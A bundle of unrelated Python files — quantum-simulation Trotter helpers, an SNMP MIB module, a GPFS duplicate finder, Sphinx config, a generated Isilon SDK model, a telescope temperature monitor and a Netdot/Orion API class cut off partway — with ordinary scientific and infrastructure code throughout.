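#   parity 0: swap positions (0,1) and (2,3):  [0, 1, 2, 3] -> [1, 0, 3, 2]
#   parity 1: swap positions (1,2):            [1, 0, 3, 2] -> [1, 3, 0, 2]
#   parity 0: swap positions (0,1) and (2,3):  [1, 3, 0, 2] -> [3, 1, 2, 0]
#   parity 1: swap positions (1,2):            [3, 1, 2, 0] -> [3, 2, 1, 0]  (input ordering reversed)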
def stagger_with_info(hamiltonian, input_ordering, parity):
"""Give terms simulated in a single stagger of a Trotter step.
Groups terms into hopping (i^ j + j^ i) and number
(i^j^ i j + c_i i^ i + c_j j^ j) operators.
Pre-computes term information (indices each operator acts on, as
well as whether each operator is a hopping operator).
Args:
hamiltonian (FermionOperator): The Hamiltonian.
input_ordering (list): The initial Jordan-Wigner canonical order.
parity (boolean): Whether to determine the terms from the next even
(False = 0) or odd (True = 1) stagger.
Returns:
A 3-tuple of terms from the Hamiltonian that are simulated in the
stagger, the indices they act on, and whether they are hopping
operators (all in the same order).
Notes:
The "staggers" used here are the left (parity=False) and right
(parity=True) staggers detailed in Kivlichan et al., "Quantum
Simulation of Electronic Structure with Linear Depth and
Connectivity", arxiv:1711.04789. As such, the Hamiltonian must be
in the form discussed in that paper. This constrains it to have
only hopping terms (i^ j + j^ i) and potential terms which are
products of at most two number operators (n_i or n_i n_j).
"""
terms_in_step = []
indices_in_step = []
is_hopping_operator_in_step = []
zero = FermionOperator.zero()
n_qubits = count_qubits(hamiltonian)
# A single round of odd-even transposition sort.
for i in range(parity, n_qubits - 1, 2):
# Always keep the max on the left to avoid having to normal order.
left = max(input_ordering[i], input_ordering[i + 1])
right = min(input_ordering[i], input_ordering[i + 1])
# Calculate the hopping operators in the Hamiltonian.
left_hopping_operator = FermionOperator(
((left, 1), (right, 0)), hamiltonian.terms.get(
((left, 1), (right, 0)), 0.0))
right_hopping_operator = FermionOperator(
((right, 1), (left, 0)), hamiltonian.terms.get(
((right, 1), (left, 0)), 0.0))
# Calculate the two-number operator l^ r^ l r in the Hamiltonian.
two_number_operator = FermionOperator(
((left, 1), (right, 1), (left, 0), (right, 0)),
hamiltonian.terms.get(
((left, 1), (right, 1), (left, 0), (right, 0)), 0.0))
# Calculate the left number operator, left^ left.
left_number_operator = FermionOperator(
((left, 1), (left, 0)), hamiltonian.terms.get(
((left, 1), (left, 0)), 0.0))
# Calculate the right number operator, right^ right.
right_number_operator = FermionOperator(
((right, 1), (right, 0)), hamiltonian.terms.get(
((right, 1), (right, 0)), 0.0))
# Divide single-number terms by n_qubits-1 to avoid over-counting.
# Each qubit is swapped n_qubits-1 times total.
left_number_operator /= (n_qubits - 1)
right_number_operator /= (n_qubits - 1)
# If the overall hopping operator isn't close to zero, append it.
# Include the indices it acts on and that it's a hopping operator.
if not (left_hopping_operator +
right_hopping_operator) == zero:
terms_in_step.append(left_hopping_operator +
right_hopping_operator)
indices_in_step.append(set((left, right)))
is_hopping_operator_in_step.append(True)
# If the overall number operator isn't close to zero, append it.
# Include the indices it acts on and that it's a number operator.
if not (two_number_operator + left_number_operator +
right_number_operator) == zero:
terms_in_step.append(two_number_operator +
left_number_operator +
right_number_operator)
indices_in_step.append(set((left, right)))
is_hopping_operator_in_step.append(False)
# Modify the current Jordan-Wigner canonical ordering in-place.
input_ordering[i], input_ordering[i + 1] = (input_ordering[i + 1],
input_ordering[i])
return terms_in_step, indices_in_step, is_hopping_operator_in_step
def ordered_low_depth_terms_no_info(hamiltonian):
"""Give terms from Hamiltonian in dictionary output order.
Args:
hamiltonian (FermionOperator): The Hamiltonian.
Returns:
A list of terms from the Hamiltonian in simulated order.
Notes:
Assumes the Hamiltonian is in the form discussed in Kivlichan
et al., "Quantum Simulation of Electronic Structure with Linear
Depth and Connectivity", arxiv:1711.04789. This constrains the
Hamiltonian to have only hopping terms (i^ j + j^ i) and potential
terms which are products of at most two number operators (n_i or
n_i n_j).
"""
n_qubits = count_qubits(hamiltonian)
hamiltonian = normal_ordered(hamiltonian)
terms = []
for operators, coefficient in iteritems(hamiltonian.terms):
terms += [FermionOperator(operators, coefficient)]
return terms
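# A minimal usage sketch (hedged: `hamiltonian` is assumed to be a plane-wave dual basis FermionOperator
# of the restricted form described in the docstrings above):
#
#   terms, indices, is_hopping = simulation_ordered_grouped_low_depth_terms_with_info(hamiltonian)
#   bound = low_depth_second_order_trotter_error_bound(terms, indices, is_hopping)
#   # `bound` upper-bounds the error in the ground state energy for a single second-order Trotter step.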
|
#
# PySNMP MIB module NGWASYNC (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/NGWASYNC
# Produced by pysmi-0.3.4 at Mon Apr 29 20:11:26 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsIntersection")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
NotificationType, ModuleIdentity, iso, MibIdentifier, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, TimeTicks, Counter32, Unsigned32, IpAddress, NotificationType, Counter64, ObjectIdentity, enterprises, Bits, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "ModuleIdentity", "iso", "MibIdentifier", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "TimeTicks", "Counter32", "Unsigned32", "IpAddress", "NotificationType", "Counter64", "ObjectIdentity", "enterprises", "Bits", "Gauge32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
wpcorp = MibIdentifier((1, 3, 6, 1, 4, 1, 922))
gateways = MibIdentifier((1, 3, 6, 1, 4, 1, 922, 2))
ngwasync = MibIdentifier((1, 3, 6, 1, 4, 1, 922, 2, 1))
ngwasyncInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 922, 2, 1, 1))
ngwasyncTrapInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 922, 2, 1, 2))
ngwasyncGatewayName = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncGatewayName.setStatus('mandatory')
ngwasyncUptime = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 2), TimeTicks()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncUptime.setStatus('mandatory')
ngwasyncGroupWiseLink = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 5))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncGroupWiseLink.setStatus('mandatory')
ngwasyncFrgnLink = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 5))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncFrgnLink.setStatus('mandatory')
ngwasyncOutBytes = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncOutBytes.setStatus('mandatory')
ngwasyncInBytes = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncInBytes.setStatus('mandatory')
ngwasyncOutMsgs = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncOutMsgs.setStatus('mandatory')
ngwasyncInMsgs = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncInMsgs.setStatus('mandatory')
ngwasyncOutStatuses = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncOutStatuses.setStatus('mandatory')
ngwasyncInStatuses = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncInStatuses.setStatus('mandatory')
ngwasyncOutErrors = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncOutErrors.setStatus('mandatory')
ngwasyncInErrors = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncInErrors.setStatus('mandatory')
ngwasyncTrapTime = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 2, 1), Integer32())
if mibBuilder.loadTexts: ngwasyncTrapTime.setStatus('mandatory')
ngwasyncStartTrap = NotificationType((1, 3, 6, 1, 4, 1, 922, 2, 1, 1) + (0,1)).setObjects(("NGWASYNC", "ngwasyncTrapTime"), ("NGWASYNC", "ngwasyncGatewayName"))
ngwasyncStopTrap = NotificationType((1, 3, 6, 1, 4, 1, 922, 2, 1, 1) + (0,2)).setObjects(("NGWASYNC", "ngwasyncTrapTime"), ("NGWASYNC", "ngwasyncGatewayName"))
ngwasyncRestartTrap = NotificationType((1, 3, 6, 1, 4, 1, 922, 2, 1, 1) + (0,3)).setObjects(("NGWASYNC", "ngwasyncTrapTime"), ("NGWASYNC", "ngwasyncGatewayName"))
ngwasyncGroupWiseLinkTrap = NotificationType((1, 3, 6, 1, 4, 1, 922, 2, 1, 1) + (0,4)).setObjects(("NGWASYNC", "ngwasyncTrapTime"), ("NGWASYNC", "ngwasyncGatewayName"))
mibBuilder.exportSymbols("NGWASYNC", gateways=gateways, ngwasyncInErrors=ngwasyncInErrors, ngwasyncOutBytes=ngwasyncOutBytes, wpcorp=wpcorp, ngwasyncGroupWiseLinkTrap=ngwasyncGroupWiseLinkTrap, ngwasync=ngwasync, ngwasyncOutErrors=ngwasyncOutErrors, ngwasyncInfo=ngwasyncInfo, ngwasyncOutMsgs=ngwasyncOutMsgs, ngwasyncInBytes=ngwasyncInBytes, ngwasyncFrgnLink=ngwasyncFrgnLink, ngwasyncGatewayName=ngwasyncGatewayName, ngwasyncInMsgs=ngwasyncInMsgs, ngwasyncUptime=ngwasyncUptime, ngwasyncGroupWiseLink=ngwasyncGroupWiseLink, ngwasyncStopTrap=ngwasyncStopTrap, ngwasyncStartTrap=ngwasyncStartTrap, ngwasyncTrapInfo=ngwasyncTrapInfo, ngwasyncOutStatuses=ngwasyncOutStatuses, ngwasyncInStatuses=ngwasyncInStatuses, ngwasyncRestartTrap=ngwasyncRestartTrap, ngwasyncTrapTime=ngwasyncTrapTime)
|
#!/usr/bin/env python2.7
"""Identify files which contain the same data (duplicates) based on md5sum of file
Caveats:
- This method is likely to be quite slow and resource heavy
- Empty files will be listed as duplicates of each other.
- Python's 'open' method follows symlinks, so they will be identified as duplicates
- Files that can't be read for whatever reason (e.g. permission denied) will be skipped
"""
from __future__ import print_function
import hashlib
from arcapix.fs.gpfs import ManagementPolicy, MapReduceRule
# method to calculate md5sum of a file
def md5sum(filename, blocksize=65536):
hash = hashlib.md5()
try:
with open(filename, "rb") as f:
for block in iter(lambda: f.read(blocksize), b""):
hash.update(block)
except:
# exclude any files that can't be read
return None
return hash.hexdigest()
# build dict of format: (hash, [list, of, paths])
def reducefn(x, y):
for k, v in y.items():
if k is None:
# couldn't md5sum file -> skip
continue
x.setdefault(k, []).extend(v)
return x
# yield lists containing duplicates
def output(out):
    for v in out.values():
if len(v) > 1:
yield v
# create policy
p = ManagementPolicy()
# create MapReduceRule with relevant processing methods
r = p.rules.new(MapReduceRule, 'duplicates',
mapfn=lambda f: {md5sum(f.path): [f.path]},
reducefn=reducefn, output=output, initial={})
# set 'SHOW' clause to only include fields we're interested in (path)
# this can give a slight speed/efficiency boost
r.change(show=r.show_performance())
# run policy against filesystem 'mmfs1'
res = p.run('mmfs1')['duplicates']
# print formatted results
for item in res:
print(", ".join(item), '\n')
# $ python find_duplicate_files.py
#/mmfs1/.policytmp/pdtest-b81839f8-13909.A590830A.0, /mmfs1/.policytmp/pdtest-7a781e4a-13909.A590830A.0.out
#
#/mmfs1/.policytmp/apsync.list.d70aac39.0, /mmfs1/.policytmp/apsync.list.bfeb0b4e.0
#
#/mmfs1/logs/2016/12/12/11/condor-45.err, /mmfs1/logs/2016/12/08/10/condor-42.err,
#/mmfs1/logs/2016/12/08/10/condor-43.err, /mmfs1/logs/2016/12/08/12/condor-44.err
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../../../'))
sys.path.insert(0, os.path.abspath('../../../macrosynergy'))
print(sys.path)
from setup import VERSION, ISRELEASED
import qstools
# sys.path.insert(0, os.path.abspath("_themes"))
# -- Project information -----------------------------------------------------
project = 'JPMAQS'
copyright = 'Copyright 2020 Macrosynergy Ltd'
author = 'Macrosynergy'
version = VERSION if ISRELEASED else f"{VERSION:s}.dev"
release = VERSION if ISRELEASED else f"{VERSION:s}.dev"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.intersphinx',
    'sphinx.ext.todo',
    'sphinx.ext.viewcode',
    'sphinx.ext.mathjax',
    'sphinx.ext.napoleon'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ["_build"]
source_suffix = ".rst"
master_doc = "index"
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = False
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# html_theme = 'sphinxdoc'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = False
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = True
# Output file base name for HTML help builder.
htmlhelp_basename = "qstoolsdoc"
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 4
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class ClusterOwner(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'company': 'str',
'location': 'str',
'primary_email': 'str',
'primary_name': 'str',
'primary_phone1': 'str',
'primary_phone2': 'str',
'secondary_email': 'str',
'secondary_name': 'str',
'secondary_phone1': 'str',
'secondary_phone2': 'str'
}
attribute_map = {
'company': 'company',
'location': 'location',
'primary_email': 'primary_email',
'primary_name': 'primary_name',
'primary_phone1': 'primary_phone1',
'primary_phone2': 'primary_phone2',
'secondary_email': 'secondary_email',
'secondary_name': 'secondary_name',
'secondary_phone1': 'secondary_phone1',
'secondary_phone2': 'secondary_phone2'
}
def __init__(self, company=None, location=None, primary_email=None, primary_name=None, primary_phone1=None, primary_phone2=None, secondary_email=None, secondary_name=None, secondary_phone1=None, secondary_phone2=None): # noqa: E501
"""ClusterOwner - a model defined in Swagger""" # noqa: E501
self._company = None
self._location = None
self._primary_email = None
self._primary_name = None
self._primary_phone1 = None
self._primary_phone2 = None
self._secondary_email = None
self._secondary_name = None
self._secondary_phone1 = None
self._secondary_phone2 = None
self.discriminator = None
if company is not None:
self.company = company
if location is not None:
self.location = location
if primary_email is not None:
self.primary_email = primary_email
if primary_name is not None:
self.primary_name = primary_name
if primary_phone1 is not None:
self.primary_phone1 = primary_phone1
if primary_phone2 is not None:
self.primary_phone2 = primary_phone2
if secondary_email is not None:
self.secondary_email = secondary_email
if secondary_name is not None:
self.secondary_name = secondary_name
if secondary_phone1 is not None:
self.secondary_phone1 = secondary_phone1
if secondary_phone2 is not None:
self.secondary_phone2 = secondary_phone2
@property
def company(self):
"""Gets the company of this ClusterOwner. # noqa: E501
Cluster owner company name. # noqa: E501
:return: The company of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._company
@company.setter
def company(self, company):
"""Sets the company of this ClusterOwner.
Cluster owner company name. # noqa: E501
:param company: The company of this ClusterOwner. # noqa: E501
:type: str
"""
self._company = company
@property
def location(self):
"""Gets the location of this ClusterOwner. # noqa: E501
Cluster owner location. # noqa: E501
:return: The location of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._location
@location.setter
def location(self, location):
"""Sets the location of this ClusterOwner.
Cluster owner location. # noqa: E501
:param location: The location of this ClusterOwner. # noqa: E501
:type: str
"""
self._location = location
@property
def primary_email(self):
"""Gets the primary_email of this ClusterOwner. # noqa: E501
Cluster owner primary email address. # noqa: E501
:return: The primary_email of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._primary_email
@primary_email.setter
def primary_email(self, primary_email):
"""Sets the primary_email of this ClusterOwner.
Cluster owner primary email address. # noqa: E501
:param primary_email: The primary_email of this ClusterOwner. # noqa: E501
:type: str
"""
self._primary_email = primary_email
@property
def primary_name(self):
"""Gets the primary_name of this ClusterOwner. # noqa: E501
Cluster owner primary contact name. # noqa: E501
:return: The primary_name of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._primary_name
@primary_name.setter
def primary_name(self, primary_name):
"""Sets the primary_name of this ClusterOwner.
Cluster owner primary contact name. # noqa: E501
:param primary_name: The primary_name of this ClusterOwner. # noqa: E501
:type: str
"""
self._primary_name = primary_name
@property
def primary_phone1(self):
"""Gets the primary_phone1 of this ClusterOwner. # noqa: E501
Cluster owner primary contact phone number 1. # noqa: E501
:return: The primary_phone1 of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._primary_phone1
@primary_phone1.setter
def primary_phone1(self, primary_phone1):
"""Sets the primary_phone1 of this ClusterOwner.
Cluster owner primary contact phone number 1. # noqa: E501
:param primary_phone1: The primary_phone1 of this ClusterOwner. # noqa: E501
:type: str
"""
self._primary_phone1 = primary_phone1
@property
def primary_phone2(self):
"""Gets the primary_phone2 of this ClusterOwner. # noqa: E501
Cluster owner primary contact phone number 2. # noqa: E501
:return: The primary_phone2 of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._primary_phone2
@primary_phone2.setter
def primary_phone2(self, primary_phone2):
"""Sets the primary_phone2 of this ClusterOwner.
Cluster owner primary contact phone number 2. # noqa: E501
:param primary_phone2: The primary_phone2 of this ClusterOwner. # noqa: E501
:type: str
"""
self._primary_phone2 = primary_phone2
@property
def secondary_email(self):
"""Gets the secondary_email of this ClusterOwner. # noqa: E501
Cluster owner secondary email address. # noqa: E501
:return: The secondary_email of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._secondary_email
@secondary_email.setter
def secondary_email(self, secondary_email):
"""Sets the secondary_email of this ClusterOwner.
Cluster owner secondary email address. # noqa: E501
:param secondary_email: The secondary_email of this ClusterOwner. # noqa: E501
:type: str
"""
self._secondary_email = secondary_email
@property
def secondary_name(self):
"""Gets the secondary_name of this ClusterOwner. # noqa: E501
Cluster owner secondary contact name. # noqa: E501
:return: The secondary_name of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._secondary_name
@secondary_name.setter
def secondary_name(self, secondary_name):
"""Sets the secondary_name of this ClusterOwner.
Cluster owner secondary contact name. # noqa: E501
:param secondary_name: The secondary_name of this ClusterOwner. # noqa: E501
:type: str
"""
self._secondary_name = secondary_name
@property
def secondary_phone1(self):
"""Gets the secondary_phone1 of this ClusterOwner. # noqa: E501
Cluster owner secondary contact phone number 1. # noqa: E501
:return: The secondary_phone1 of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._secondary_phone1
@secondary_phone1.setter
def secondary_phone1(self, secondary_phone1):
"""Sets the secondary_phone1 of this ClusterOwner.
Cluster owner secondary contact phone number 1. # noqa: E501
:param secondary_phone1: The secondary_phone1 of this ClusterOwner. # noqa: E501
:type: str
"""
self._secondary_phone1 = secondary_phone1
@property
def secondary_phone2(self):
"""Gets the secondary_phone2 of this ClusterOwner. # noqa: E501
Cluster owner secondary contact phone number 2. # noqa: E501
:return: The secondary_phone2 of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._secondary_phone2
@secondary_phone2.setter
def secondary_phone2(self, secondary_phone2):
"""Sets the secondary_phone2 of this ClusterOwner.
Cluster owner secondary contact phone number 2. # noqa: E501
:param secondary_phone2: The secondary_phone2 of this ClusterOwner. # noqa: E501
:type: str
"""
self._secondary_phone2 = secondary_phone2
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ClusterOwner):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
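# A minimal usage sketch (not part of the generated module): construct a
# ClusterOwner with a couple of hypothetical contact details and serialise it.
if __name__ == "__main__":
    owner = ClusterOwner(company="Example Corp", primary_name="Jane Doe",
                         primary_email="jane.doe@example.com")
    print(owner.to_dict())
    # equality is based on the full attribute dict
    print(owner == ClusterOwner(company="Example Corp", primary_name="Jane Doe",
                                primary_email="jane.doe@example.com"))  # True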
|
from . import m_module_template
class MicroarrayGeneMapping(m_module_template.MicroarrayModule):
def __init__(self, owner):
self.owner = owner
def add_tag(self):
self.data = None #Fake
def map_gene(self):
self.data = None #Fake
def merge_different_platform_data(self):
self.data = None #Fake
|
#!/usr/bin/env python
"""Monitor BOSS temperatures and LN2 levels
History:
2012-04-23 Elena Malanushenko, converted from a script to a window by Russell Owen
2012-06-04 ROwen Fix clear button.
2015-11-03 ROwen Replace "== None" with "is None" and "!= None" with "is not None" to modernize the code.
"""
import Tkinter
import matplotlib
import RO.Wdg
import TUI.Base.StripChartWdg
import TUI.Models
WindowName = "Inst.BOSS Monitor"
def addWindow(tlSet):
"""Create the window for TUI.
"""
tlSet.createToplevel(
name = WindowName,
defGeom = "+434+33",
visible = False,
resizable = True,
wdgFunc = BOSSTemperatureMonitorWdg,
)
class BOSSTemperatureMonitorWdg(Tkinter.Frame):
def __init__(self, master, timeRange=1800, width=8, height=4):
"""Create a BOSSTemperatureMonitorWdg
Inputs:
- master: parent Tk widget
- timeRange: range of time displayed (seconds)
- width: width of plot (inches)
- height: height of plot (inches)
"""
Tkinter.Frame.__init__(self, master)
self.bossModel = TUI.Models.getModel("boss")
self.stripChartWdg = TUI.Base.StripChartWdg.StripChartWdg(
master = self,
timeRange = timeRange,
numSubplots = 2,
width = width,
height = height,
cnvTimeFunc = TUI.Base.StripChartWdg.TimeConverter(useUTC=True),
)
self.stripChartWdg.grid(row=0, column=0, sticky="nwes")
self.grid_rowconfigure(0, weight=1)
self.grid_columnconfigure(0, weight=1)
# the default ticks are not nice, so be explicit
self.stripChartWdg.xaxis.set_major_locator(matplotlib.dates.MinuteLocator(byminute=range(0, 61, 5)))
self.cameraNameList = (
"sp1r0",
"sp1b2",
# "sp2r0",
# "sp2b2",
)
self.cameraNameColorDict = {
"sp1r0": "red",
"sp1b2": "green",
# "sp2r0": "blue",
# "sp2b2": "black",
}
self.nomTempColorDict = dict() # dict of camera name: color
self.nomTempLineDict = dict() # dict of camera name: nominal temperature line (if present)
self.readTempLineDict = dict() # dict of camera name: read temperature line
for cameraName in self.cameraNameList:
self.addTemperatureLines(cameraName)
self.stripChartWdg.showY(-140.0, -90.0, subplotInd=0)
self.stripChartWdg.subplotArr[0].legend(loc=3, frameon=False)
self.stripChartWdg.subplotArr[0].yaxis.set_label_text("CCDTemp (C)")
self.stripChartWdg.plotKeyVar(
label = "sp1",
subplotInd = 1,
keyVar = self.bossModel.SP1SecondaryDewarPress,
keyInd = 0,
color = "blue",
)
# self.stripChartWdg.plotKeyVar(
# label = "sp2",
# subplotInd = 1,
# keyVar = self.bossModel.SP2SecondaryDewarPress,
# keyInd = 0,
# color = "red",
# )
self.stripChartWdg.addConstantLine(10.0, subplotInd=1, color="grey")
self.stripChartWdg.showY(0.1, 10.5, subplotInd=1)
self.stripChartWdg.subplotArr[1].legend(loc=3, frameon=False)
self.stripChartWdg.subplotArr[1].yaxis.set_label_text("Ln2 Pressure")
self.clearWdg = RO.Wdg.Button(master = self, text = "C", callFunc = self.clearCharts)
self.clearWdg.grid(row=0, column=0, sticky = "sw")
def addTemperatureLines(self, cameraName):
"""Add read temperature line for a given camera; does not check if it already exists
Also sets a callback for nominal temperature to draw a constant line
"""
uprCameraName = cameraName.upper()
tempNomKeyVar = getattr(self.bossModel, "%sCCDTempNom" % (uprCameraName,))
def callFunc(keyVar, self=self, cameraName=cameraName):
self.nomTempCallback(keyVar, cameraName=cameraName)
tempNomKeyVar.addCallback(callFunc)
tempReadKeyVar = getattr(self.bossModel, "%sCCDTempRead" % (uprCameraName,))
color = self.cameraNameColorDict[cameraName]
line = self.stripChartWdg.plotKeyVar(
label = cameraName,
subplotInd = 0,
keyVar = tempReadKeyVar,
keyInd = 0,
color = color,
)
self.readTempLineDict[cameraName] = line
return line
def clearCharts(self, wdg=None):
"""Clear all strip charts
"""
self.stripChartWdg.clear()
def nomTempCallback(self, keyVar, cameraName):
"""Draw a constant line for a new value of a nominal temperature
"""
color = self.cameraNameColorDict[cameraName]
line = self.nomTempLineDict.pop(cameraName, None)
if line:
self.stripChartWdg.removeLine(line)
nomTemp = keyVar[0]
if nomTemp is None:
return
line = self.stripChartWdg.addConstantLine(
nomTemp,
color = color,
linestyle = "--",
)
self.nomTempLineDict[cameraName] = line
readLine = self.readTempLineDict[cameraName]
readLine.line2d.set_label("%s (%0.1f)" % (cameraName, nomTemp))
self.stripChartWdg.subplotArr[0].legend(loc=3, frameon=False)
if __name__ == "__main__":
import TestData
addWindow(TestData.tuiModel.tlSet)
TestData.tuiModel.tlSet.makeVisible(WindowName)
# TestData.runTest()
TestData.tuiModel.reactor.run()
|
import torch
def inv_softplus(x):
return x + torch.log(-torch.expm1(-x))
def inv_sigmoid(x):
return torch.log(x) - torch.log(1 - x)
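# A minimal sanity check (not part of the original module): these inverses
# should round-trip torch's softplus and sigmoid up to floating-point error.
if __name__ == "__main__":
    import torch.nn.functional as F
    x = torch.linspace(0.1, 5.0, steps=10)
    assert torch.allclose(inv_softplus(F.softplus(x)), x, atol=1e-5)
    p = torch.linspace(0.01, 0.99, steps=10)
    assert torch.allclose(torch.sigmoid(inv_sigmoid(p)), p, atol=1e-5)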
|
# This class uses APIs to interact with Netdot and the SolarWinds Orion NPM server
import re
import requests
from orionsdk import SwisClient
import pynetdot
import ipaddress
import ipaddr
__author__ = "Paul S.I. Basondole"
__version__ = "Code 2.0 Python 3.7"
__maintainer__ = "Paul S.I. Basondole"
__email__ = "bassosimons@me.com"
class NetdotOrionServers():
def __init__(self,username,password):
self.username = username
self.password = password
def getFromNetdot(self,netdot_url,residentblocks):
# login to netdot
pynetdot.setup(url=netdot_url,username=self.username,password=self.password)
# search netdot for resident block and get its used subnets
usedSubnetList = [] # list to record used ip subnets from netdot
try:
for residentblock in residentblocks:
for block in pynetdot.Ipblock.search(address=residentblock):
for ip in block.children:
usedSubnetList.append(ip.address+"/"+str(ip.prefix))
except requests.exceptions.MissingSchema: return AttributeError # if the URL is not valid
except AttributeError: return AttributeError # if credentials are wrong
except requests.exceptions.ConnectionError: return AttributeError # used to raise a dialog for connection issues
except Exception as e: return e
#create a list of all /30 from the resident blocks
